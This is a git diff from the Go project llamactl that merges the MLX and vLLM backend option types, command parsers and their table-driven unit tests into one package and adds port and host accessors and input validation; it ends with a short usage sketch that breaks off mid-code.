return backends.BuildCommandArgs(o, multipleFlags)
|
||||
return BuildCommandArgs(o, multipleFlags)
|
||||
}
|
||||
|
||||
func (o *MlxServerOptions) BuildDockerArgs() []string {
|
||||
return []string{}
|
||||
}
|
||||
|
||||
// ParseMlxCommand parses a mlx_lm.server command string into MlxServerOptions
|
||||
@@ -48,7 +82,7 @@ func ParseMlxCommand(command string) (*MlxServerOptions, error) {
|
||||
multiValuedFlags := map[string]bool{} // MLX has no multi-valued flags
|
||||
|
||||
var mlxOptions MlxServerOptions
|
||||
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
|
||||
if err := ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
@@ -1,157 +0,0 @@
|
||||
package mlx_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends/mlx"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestParseMlxCommand(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
command string
|
||||
expectErr bool
|
||||
}{
|
||||
{
|
||||
name: "basic command",
|
||||
command: "mlx_lm.server --model /path/to/model --host 0.0.0.0",
|
||||
expectErr: false,
|
||||
},
|
||||
{
|
||||
name: "args only",
|
||||
command: "--model /path/to/model --port 8080",
|
||||
expectErr: false,
|
||||
},
|
||||
{
|
||||
name: "mixed flag formats",
|
||||
command: "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code",
|
||||
expectErr: false,
|
||||
},
|
||||
{
|
||||
name: "quoted strings",
|
||||
command: `mlx_lm.server --model test.mlx --chat-template "User: {user}\nAssistant: "`,
|
||||
expectErr: false,
|
||||
},
|
||||
{
|
||||
name: "empty command",
|
||||
command: "",
|
||||
expectErr: true,
|
||||
},
|
||||
{
|
||||
name: "unterminated quote",
|
||||
command: `mlx_lm.server --model test.mlx --chat-template "unterminated`,
|
||||
expectErr: true,
|
||||
},
|
||||
{
|
||||
name: "malformed flag",
|
||||
command: "mlx_lm.server ---model test.mlx",
|
||||
expectErr: true,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result, err := mlx.ParseMlxCommand(tt.command)
|
||||
|
||||
if tt.expectErr {
|
||||
if err == nil {
|
||||
t.Errorf("expected error but got none")
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
t.Errorf("unexpected error: %v", err)
|
||||
return
|
||||
}
|
||||
|
||||
if result == nil {
|
||||
t.Errorf("expected result but got nil")
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestParseMlxCommandValues(t *testing.T) {
|
||||
command := "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG"
|
||||
result, err := mlx.ParseMlxCommand(command)
|
||||
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if result.Model != "/test/model.mlx" {
|
||||
t.Errorf("expected model '/test/model.mlx', got '%s'", result.Model)
|
||||
}
|
||||
|
||||
if result.Port != 8080 {
|
||||
t.Errorf("expected port 8080, got %d", result.Port)
|
||||
}
|
||||
|
||||
if result.Temp != 0.7 {
|
||||
t.Errorf("expected temp 0.7, got %f", result.Temp)
|
||||
}
|
||||
|
||||
if !result.TrustRemoteCode {
|
||||
t.Errorf("expected trust_remote_code to be true")
|
||||
}
|
||||
|
||||
if result.LogLevel != "DEBUG" {
|
||||
t.Errorf("expected log_level 'DEBUG', got '%s'", result.LogLevel)
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs(t *testing.T) {
|
||||
options := &mlx.MlxServerOptions{
|
||||
Model: "/test/model.mlx",
|
||||
Host: "127.0.0.1",
|
||||
Port: 8080,
|
||||
Temp: 0.7,
|
||||
TopP: 0.9,
|
||||
TopK: 40,
|
||||
MaxTokens: 2048,
|
||||
TrustRemoteCode: true,
|
||||
LogLevel: "DEBUG",
|
||||
ChatTemplate: "custom template",
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
// Check that all expected flags are present
|
||||
expectedFlags := map[string]string{
|
||||
"--model": "/test/model.mlx",
|
||||
"--host": "127.0.0.1",
|
||||
"--port": "8080",
|
||||
"--log-level": "DEBUG",
|
||||
"--chat-template": "custom template",
|
||||
"--temp": "0.7",
|
||||
"--top-p": "0.9",
|
||||
"--top-k": "40",
|
||||
"--max-tokens": "2048",
|
||||
}
|
||||
|
||||
for i := 0; i < len(args); i++ {
|
||||
if args[i] == "--trust-remote-code" {
|
||||
continue // Boolean flag with no value
|
||||
}
|
||||
if args[i] == "--use-default-chat-template" {
|
||||
continue // Boolean flag with no value
|
||||
}
|
||||
|
||||
if expectedValue, exists := expectedFlags[args[i]]; exists && i+1 < len(args) {
|
||||
if args[i+1] != expectedValue {
|
||||
t.Errorf("expected %s to have value %s, got %s", args[i], expectedValue, args[i+1])
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check boolean flags
|
||||
foundTrustRemoteCode := false
|
||||
for _, arg := range args {
|
||||
if arg == "--trust-remote-code" {
|
||||
foundTrustRemoteCode = true
|
||||
}
|
||||
}
|
||||
if !foundTrustRemoteCode {
|
||||
t.Errorf("expected --trust-remote-code flag to be present")
|
||||
}
|
||||
}
|
||||
pkg/backends/mlx_test.go (new file) | 202
@@ -0,0 +1,202 @@
|
||||
package backends_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/testutil"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestParseMlxCommand(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
command string
|
||||
expectErr bool
|
||||
validate func(*testing.T, *backends.MlxServerOptions)
|
||||
}{
|
||||
{
|
||||
name: "basic command",
|
||||
command: "mlx_lm.server --model /path/to/model --host 0.0.0.0",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.MlxServerOptions) {
|
||||
if opts.Model != "/path/to/model" {
|
||||
t.Errorf("expected model '/path/to/model', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.Host != "0.0.0.0" {
|
||||
t.Errorf("expected host '0.0.0.0', got '%s'", opts.Host)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "args only",
|
||||
command: "--model /path/to/model --port 8080",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.MlxServerOptions) {
|
||||
if opts.Model != "/path/to/model" {
|
||||
t.Errorf("expected model '/path/to/model', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.Port != 8080 {
|
||||
t.Errorf("expected port 8080, got %d", opts.Port)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "mixed flag formats",
|
||||
command: "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.MlxServerOptions) {
|
||||
if opts.Model != "/path/model" {
|
||||
t.Errorf("expected model '/path/model', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.Temp != 0.7 {
|
||||
t.Errorf("expected temp 0.7, got %f", opts.Temp)
|
||||
}
|
||||
if !opts.TrustRemoteCode {
|
||||
t.Errorf("expected trust_remote_code to be true")
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "multiple value types",
|
||||
command: "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.MlxServerOptions) {
|
||||
if opts.Model != "/test/model.mlx" {
|
||||
t.Errorf("expected model '/test/model.mlx', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.Port != 8080 {
|
||||
t.Errorf("expected port 8080, got %d", opts.Port)
|
||||
}
|
||||
if opts.Temp != 0.7 {
|
||||
t.Errorf("expected temp 0.7, got %f", opts.Temp)
|
||||
}
|
||||
if !opts.TrustRemoteCode {
|
||||
t.Errorf("expected trust_remote_code to be true")
|
||||
}
|
||||
if opts.LogLevel != "DEBUG" {
|
||||
t.Errorf("expected log_level 'DEBUG', got '%s'", opts.LogLevel)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "empty command",
|
||||
command: "",
|
||||
expectErr: true,
|
||||
},
|
||||
{
|
||||
name: "unterminated quote",
|
||||
command: `mlx_lm.server --model test.mlx --chat-template "unterminated`,
|
||||
expectErr: true,
|
||||
},
|
||||
{
|
||||
name: "malformed flag",
|
||||
command: "mlx_lm.server ---model test.mlx",
|
||||
expectErr: true,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result, err := backends.ParseMlxCommand(tt.command)
|
||||
|
||||
if tt.expectErr {
|
||||
if err == nil {
|
||||
t.Errorf("expected error but got none")
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
t.Errorf("unexpected error: %v", err)
|
||||
return
|
||||
}
|
||||
|
||||
if result == nil {
|
||||
t.Errorf("expected result but got nil")
|
||||
return
|
||||
}
|
||||
|
||||
if tt.validate != nil {
|
||||
tt.validate(t, result)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestMlxBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
options backends.MlxServerOptions
|
||||
expected []string
|
||||
excluded []string
|
||||
}{
|
||||
{
|
||||
name: "trust_remote_code true",
|
||||
options: backends.MlxServerOptions{
|
||||
TrustRemoteCode: true,
|
||||
},
|
||||
expected: []string{"--trust-remote-code"},
|
||||
},
|
||||
{
|
||||
name: "trust_remote_code false",
|
||||
options: backends.MlxServerOptions{
|
||||
TrustRemoteCode: false,
|
||||
},
|
||||
excluded: []string{"--trust-remote-code"},
|
||||
},
|
||||
{
|
||||
name: "multiple booleans",
|
||||
options: backends.MlxServerOptions{
|
||||
TrustRemoteCode: true,
|
||||
UseDefaultChatTemplate: true,
|
||||
},
|
||||
expected: []string{"--trust-remote-code", "--use-default-chat-template"},
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
args := tt.options.BuildCommandArgs()
|
||||
|
||||
for _, expectedArg := range tt.expected {
|
||||
if !testutil.Contains(args, expectedArg) {
|
||||
t.Errorf("Expected argument %q not found in %v", expectedArg, args)
|
||||
}
|
||||
}
|
||||
|
||||
for _, excludedArg := range tt.excluded {
|
||||
if testutil.Contains(args, excludedArg) {
|
||||
t.Errorf("Excluded argument %q found in %v", excludedArg, args)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestMlxBuildCommandArgs_ZeroValues(t *testing.T) {
|
||||
options := backends.MlxServerOptions{
|
||||
Port: 0, // Should be excluded
|
||||
TopK: 0, // Should be excluded
|
||||
Temp: 0, // Should be excluded
|
||||
Model: "", // Should be excluded
|
||||
LogLevel: "", // Should be excluded
|
||||
TrustRemoteCode: false, // Should be excluded
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
// Zero values should not appear in arguments
|
||||
excludedArgs := []string{
|
||||
"--port", "0",
|
||||
"--top-k", "0",
|
||||
"--temp", "0",
|
||||
"--model", "",
|
||||
"--log-level", "",
|
||||
"--trust-remote-code",
|
||||
}
|
||||
|
||||
for _, excludedArg := range excludedArgs {
|
||||
if testutil.Contains(args, excludedArg) {
|
||||
t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args)
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,11 +1,12 @@
|
||||
package vllm
|
||||
package backends
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends"
|
||||
"fmt"
|
||||
"llamactl/pkg/validation"
|
||||
)
|
||||
|
||||
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
|
||||
var multiValuedFlags = map[string]bool{
|
||||
// vllmMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated
|
||||
var vllmMultiValuedFlags = map[string]bool{
|
||||
"api-key": true,
|
||||
"allowed-origins": true,
|
||||
"allowed-methods": true,
|
||||
@@ -139,6 +140,36 @@ type VllmServerOptions struct {
|
||||
OverrideKVCacheALIGNSize int `json:"override_kv_cache_align_size,omitempty"`
|
||||
}
|
||||
|
||||
func (o *VllmServerOptions) GetPort() int {
|
||||
return o.Port
|
||||
}
|
||||
|
||||
func (o *VllmServerOptions) SetPort(port int) {
|
||||
o.Port = port
|
||||
}
|
||||
|
||||
func (o *VllmServerOptions) GetHost() string {
|
||||
return o.Host
|
||||
}
|
||||
|
||||
func (o *VllmServerOptions) Validate() error {
|
||||
if o == nil {
|
||||
return validation.ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
|
||||
}
|
||||
|
||||
// Use reflection to check all string fields for injection patterns
|
||||
if err := validation.ValidateStructStrings(o, ""); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// Basic network validation for port
|
||||
if o.Port < 0 || o.Port > 65535 {
|
||||
return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// BuildCommandArgs converts VllmServerOptions to command line arguments
|
||||
// For vLLM native, model is a positional argument after "serve"
|
||||
func (o *VllmServerOptions) BuildCommandArgs() []string {
|
||||
@@ -155,7 +186,7 @@ func (o *VllmServerOptions) BuildCommandArgs() []string {
|
||||
|
||||
// Use package-level multipleFlags variable
|
||||
|
||||
flagArgs := backends.BuildCommandArgs(&optionsCopy, multiValuedFlags)
|
||||
flagArgs := BuildCommandArgs(&optionsCopy, vllmMultiValuedFlags)
|
||||
args = append(args, flagArgs...)
|
||||
|
||||
return args
|
||||
@@ -165,7 +196,7 @@ func (o *VllmServerOptions) BuildDockerArgs() []string {
|
||||
var args []string
|
||||
|
||||
// Use package-level multipleFlags variable
|
||||
flagArgs := backends.BuildCommandArgs(o, multiValuedFlags)
|
||||
flagArgs := BuildCommandArgs(o, vllmMultiValuedFlags)
|
||||
args = append(args, flagArgs...)
|
||||
|
||||
return args
|
||||
@@ -192,7 +223,7 @@ func ParseVllmCommand(command string) (*VllmServerOptions, error) {
|
||||
}
|
||||
|
||||
var vllmOptions VllmServerOptions
|
||||
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil {
|
||||
if err := ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
@@ -1,153 +0,0 @@
|
||||
package vllm_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends/vllm"
|
||||
"slices"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestParseVllmCommand(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
command string
|
||||
expectErr bool
|
||||
}{
|
||||
{
|
||||
name: "basic vllm serve command",
|
||||
command: "vllm serve microsoft/DialoGPT-medium",
|
||||
expectErr: false,
|
||||
},
|
||||
{
|
||||
name: "serve only command",
|
||||
command: "serve microsoft/DialoGPT-medium",
|
||||
expectErr: false,
|
||||
},
|
||||
{
|
||||
name: "positional model with flags",
|
||||
command: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2",
|
||||
expectErr: false,
|
||||
},
|
||||
{
|
||||
name: "model with path",
|
||||
command: "vllm serve /path/to/model --gpu-memory-utilization 0.8",
|
||||
expectErr: false,
|
||||
},
|
||||
{
|
||||
name: "empty command",
|
||||
command: "",
|
||||
expectErr: true,
|
||||
},
|
||||
{
|
||||
name: "unterminated quote",
|
||||
command: `vllm serve "unterminated`,
|
||||
expectErr: true,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result, err := vllm.ParseVllmCommand(tt.command)
|
||||
|
||||
if tt.expectErr {
|
||||
if err == nil {
|
||||
t.Errorf("expected error but got none")
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
t.Errorf("unexpected error: %v", err)
|
||||
return
|
||||
}
|
||||
|
||||
if result == nil {
|
||||
t.Errorf("expected result but got nil")
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestParseVllmCommandValues(t *testing.T) {
|
||||
command := "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs"
|
||||
result, err := vllm.ParseVllmCommand(command)
|
||||
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if result.Model != "test-model" {
|
||||
t.Errorf("expected model 'test-model', got '%s'", result.Model)
|
||||
}
|
||||
if result.TensorParallelSize != 4 {
|
||||
t.Errorf("expected tensor_parallel_size 4, got %d", result.TensorParallelSize)
|
||||
}
|
||||
if result.GPUMemoryUtilization != 0.8 {
|
||||
t.Errorf("expected gpu_memory_utilization 0.8, got %f", result.GPUMemoryUtilization)
|
||||
}
|
||||
if !result.EnableLogOutputs {
|
||||
t.Errorf("expected enable_log_outputs true, got %v", result.EnableLogOutputs)
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs(t *testing.T) {
|
||||
options := vllm.VllmServerOptions{
|
||||
Model: "microsoft/DialoGPT-medium",
|
||||
Port: 8080,
|
||||
Host: "localhost",
|
||||
TensorParallelSize: 2,
|
||||
GPUMemoryUtilization: 0.8,
|
||||
EnableLogOutputs: true,
|
||||
AllowedOrigins: []string{"http://localhost:3000", "https://example.com"},
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
// Check that model is the first positional argument (not a --model flag)
|
||||
if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" {
|
||||
t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args)
|
||||
}
|
||||
|
||||
// Check that --model flag is NOT present (since model should be positional)
|
||||
if contains(args, "--model") {
|
||||
t.Errorf("Found --model flag, but model should be positional argument in args: %v", args)
|
||||
}
|
||||
|
||||
// Check other flags
|
||||
if !containsFlagWithValue(args, "--tensor-parallel-size", "2") {
|
||||
t.Errorf("Expected --tensor-parallel-size 2 not found in %v", args)
|
||||
}
|
||||
if !contains(args, "--enable-log-outputs") {
|
||||
t.Errorf("Expected --enable-log-outputs not found in %v", args)
|
||||
}
|
||||
if !contains(args, "--host") {
|
||||
t.Errorf("Expected --host not found in %v", args)
|
||||
}
|
||||
if !contains(args, "--port") {
|
||||
t.Errorf("Expected --port not found in %v", args)
|
||||
}
|
||||
|
||||
// Check array handling (multiple flags)
|
||||
allowedOriginsCount := 0
|
||||
for i := range args {
|
||||
if args[i] == "--allowed-origins" {
|
||||
allowedOriginsCount++
|
||||
}
|
||||
}
|
||||
if allowedOriginsCount != 2 {
|
||||
t.Errorf("Expected 2 --allowed-origins flags, got %d", allowedOriginsCount)
|
||||
}
|
||||
}
|
||||
|
||||
// Helper functions
|
||||
func contains(slice []string, item string) bool {
|
||||
return slices.Contains(slice, item)
|
||||
}
|
||||
|
||||
func containsFlagWithValue(args []string, flag, value string) bool {
|
||||
for i, arg := range args {
|
||||
if arg == flag && i+1 < len(args) && args[i+1] == value {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
pkg/backends/vllm_test.go (new file) | 286
@@ -0,0 +1,286 @@
|
||||
package backends_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/testutil"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestParseVllmCommand(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
command string
|
||||
expectErr bool
|
||||
validate func(*testing.T, *backends.VllmServerOptions)
|
||||
}{
|
||||
{
|
||||
name: "basic vllm serve command",
|
||||
command: "vllm serve microsoft/DialoGPT-medium",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.VllmServerOptions) {
|
||||
if opts.Model != "microsoft/DialoGPT-medium" {
|
||||
t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "serve only command",
|
||||
command: "serve microsoft/DialoGPT-medium",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.VllmServerOptions) {
|
||||
if opts.Model != "microsoft/DialoGPT-medium" {
|
||||
t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "positional model with flags",
|
||||
command: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.VllmServerOptions) {
|
||||
if opts.Model != "microsoft/DialoGPT-medium" {
|
||||
t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.TensorParallelSize != 2 {
|
||||
t.Errorf("expected tensor_parallel_size 2, got %d", opts.TensorParallelSize)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "model with path",
|
||||
command: "vllm serve /path/to/model --gpu-memory-utilization 0.8",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.VllmServerOptions) {
|
||||
if opts.Model != "/path/to/model" {
|
||||
t.Errorf("expected model '/path/to/model', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.GPUMemoryUtilization != 0.8 {
|
||||
t.Errorf("expected gpu_memory_utilization 0.8, got %f", opts.GPUMemoryUtilization)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "multiple value types",
|
||||
command: "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.VllmServerOptions) {
|
||||
if opts.Model != "test-model" {
|
||||
t.Errorf("expected model 'test-model', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.TensorParallelSize != 4 {
|
||||
t.Errorf("expected tensor_parallel_size 4, got %d", opts.TensorParallelSize)
|
||||
}
|
||||
if opts.GPUMemoryUtilization != 0.8 {
|
||||
t.Errorf("expected gpu_memory_utilization 0.8, got %f", opts.GPUMemoryUtilization)
|
||||
}
|
||||
if !opts.EnableLogOutputs {
|
||||
t.Errorf("expected enable_log_outputs true, got %v", opts.EnableLogOutputs)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "empty command",
|
||||
command: "",
|
||||
expectErr: true,
|
||||
},
|
||||
{
|
||||
name: "unterminated quote",
|
||||
command: `vllm serve "unterminated`,
|
||||
expectErr: true,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result, err := backends.ParseVllmCommand(tt.command)
|
||||
|
||||
if tt.expectErr {
|
||||
if err == nil {
|
||||
t.Errorf("expected error but got none")
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
t.Errorf("unexpected error: %v", err)
|
||||
return
|
||||
}
|
||||
|
||||
if result == nil {
|
||||
t.Errorf("expected result but got nil")
|
||||
return
|
||||
}
|
||||
|
||||
if tt.validate != nil {
|
||||
tt.validate(t, result)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestVllmBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
options backends.VllmServerOptions
|
||||
expected []string
|
||||
excluded []string
|
||||
}{
|
||||
{
|
||||
name: "enable_log_outputs true",
|
||||
options: backends.VllmServerOptions{
|
||||
EnableLogOutputs: true,
|
||||
},
|
||||
expected: []string{"--enable-log-outputs"},
|
||||
},
|
||||
{
|
||||
name: "enable_log_outputs false",
|
||||
options: backends.VllmServerOptions{
|
||||
EnableLogOutputs: false,
|
||||
},
|
||||
excluded: []string{"--enable-log-outputs"},
|
||||
},
|
||||
{
|
||||
name: "multiple booleans",
|
||||
options: backends.VllmServerOptions{
|
||||
EnableLogOutputs: true,
|
||||
TrustRemoteCode: true,
|
||||
EnablePrefixCaching: true,
|
||||
DisableLogStats: false,
|
||||
},
|
||||
expected: []string{"--enable-log-outputs", "--trust-remote-code", "--enable-prefix-caching"},
|
||||
excluded: []string{"--disable-log-stats"},
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
args := tt.options.BuildCommandArgs()
|
||||
|
||||
for _, expectedArg := range tt.expected {
|
||||
if !testutil.Contains(args, expectedArg) {
|
||||
t.Errorf("Expected argument %q not found in %v", expectedArg, args)
|
||||
}
|
||||
}
|
||||
|
||||
for _, excludedArg := range tt.excluded {
|
||||
if testutil.Contains(args, excludedArg) {
|
||||
t.Errorf("Excluded argument %q found in %v", excludedArg, args)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestVllmBuildCommandArgs_ZeroValues(t *testing.T) {
|
||||
options := backends.VllmServerOptions{
|
||||
Port: 0, // Should be excluded
|
||||
TensorParallelSize: 0, // Should be excluded
|
||||
GPUMemoryUtilization: 0, // Should be excluded
|
||||
Model: "", // Should be excluded (positional arg)
|
||||
Host: "", // Should be excluded
|
||||
EnableLogOutputs: false, // Should be excluded
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
// Zero values should not appear in arguments
|
||||
excludedArgs := []string{
|
||||
"--port", "0",
|
||||
"--tensor-parallel-size", "0",
|
||||
"--gpu-memory-utilization", "0",
|
||||
"--host", "",
|
||||
"--enable-log-outputs",
|
||||
}
|
||||
|
||||
for _, excludedArg := range excludedArgs {
|
||||
if testutil.Contains(args, excludedArg) {
|
||||
t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args)
|
||||
}
|
||||
}
|
||||
|
||||
// Model should not be present as positional arg when empty
|
||||
if len(args) > 0 && args[0] == "" {
|
||||
t.Errorf("Empty model should not be present as positional argument")
|
||||
}
|
||||
}
|
||||
|
||||
func TestVllmBuildCommandArgs_ArrayFields(t *testing.T) {
|
||||
options := backends.VllmServerOptions{
|
||||
AllowedOrigins: []string{"http://localhost:3000", "https://example.com"},
|
||||
AllowedMethods: []string{"GET", "POST"},
|
||||
Middleware: []string{"middleware1", "middleware2", "middleware3"},
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
// Check that each array value appears with its flag
|
||||
expectedOccurrences := map[string][]string{
|
||||
"--allowed-origins": {"http://localhost:3000", "https://example.com"},
|
||||
"--allowed-methods": {"GET", "POST"},
|
||||
"--middleware": {"middleware1", "middleware2", "middleware3"},
|
||||
}
|
||||
|
||||
for flag, values := range expectedOccurrences {
|
||||
for _, value := range values {
|
||||
if !testutil.ContainsFlagWithValue(args, flag, value) {
|
||||
t.Errorf("Expected %s %s, not found in %v", flag, value, args)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestVllmBuildCommandArgs_EmptyArrays(t *testing.T) {
|
||||
options := backends.VllmServerOptions{
|
||||
AllowedOrigins: []string{}, // Empty array should not generate args
|
||||
Middleware: []string{}, // Empty array should not generate args
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
excludedArgs := []string{"--allowed-origins", "--middleware"}
|
||||
for _, excludedArg := range excludedArgs {
|
||||
if testutil.Contains(args, excludedArg) {
|
||||
t.Errorf("Empty array should not generate argument %q in %v", excludedArg, args)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestVllmBuildCommandArgs_PositionalModel(t *testing.T) {
|
||||
options := backends.VllmServerOptions{
|
||||
Model: "microsoft/DialoGPT-medium",
|
||||
Port: 8080,
|
||||
Host: "localhost",
|
||||
TensorParallelSize: 2,
|
||||
GPUMemoryUtilization: 0.8,
|
||||
EnableLogOutputs: true,
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
// Check that model is the first positional argument (not a --model flag)
|
||||
if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" {
|
||||
t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args)
|
||||
}
|
||||
|
||||
// Check that --model flag is NOT present (since model should be positional)
|
||||
if testutil.Contains(args, "--model") {
|
||||
t.Errorf("Found --model flag, but model should be positional argument in args: %v", args)
|
||||
}
|
||||
|
||||
// Check other flags
|
||||
if !testutil.ContainsFlagWithValue(args, "--tensor-parallel-size", "2") {
|
||||
t.Errorf("Expected --tensor-parallel-size 2 not found in %v", args)
|
||||
}
|
||||
if !testutil.ContainsFlagWithValue(args, "--gpu-memory-utilization", "0.8") {
|
||||
t.Errorf("Expected --gpu-memory-utilization 0.8 not found in %v", args)
|
||||
}
|
||||
if !testutil.Contains(args, "--enable-log-outputs") {
|
||||
t.Errorf("Expected --enable-log-outputs not found in %v", args)
|
||||
}
|
||||
if !testutil.ContainsFlagWithValue(args, "--host", "localhost") {
|
||||
t.Errorf("Expected --host localhost not found in %v", args)
|
||||
}
|
||||
if !testutil.ContainsFlagWithValue(args, "--port", "8080") {
|
||||
t.Errorf("Expected --port 8080 not found in %v", args)
|
||||
}
|
||||
}
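
For reference, a minimal sketch of what these tests imply about the vLLM argument builder; field names are the ones used in the tests above, and the exact flag ordering is not asserted by them, only presence:

package main

import (
	"fmt"

	"llamactl/pkg/backends"
)

func main() {
	// Same options as TestVllmBuildCommandArgs_PositionalModel above.
	opts := backends.VllmServerOptions{
		Model:                "microsoft/DialoGPT-medium",
		Host:                 "localhost",
		Port:                 8080,
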